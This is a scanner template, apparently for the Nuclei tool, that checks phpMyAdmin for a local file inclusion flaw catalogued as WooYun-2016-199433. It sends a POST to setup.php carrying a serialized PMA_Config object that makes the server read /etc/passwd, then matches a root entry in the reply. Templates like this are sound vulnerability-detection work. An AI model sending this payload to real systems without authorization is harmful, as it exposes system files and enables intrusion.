id: phpmyadmin-wooyun info: name: phpMyAdmin-WooYun author: dhiyaneshDK severity: high reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ tags: phpmyadmin,lfi requests: - raw: - | POST /scripts/setup.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 82 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:"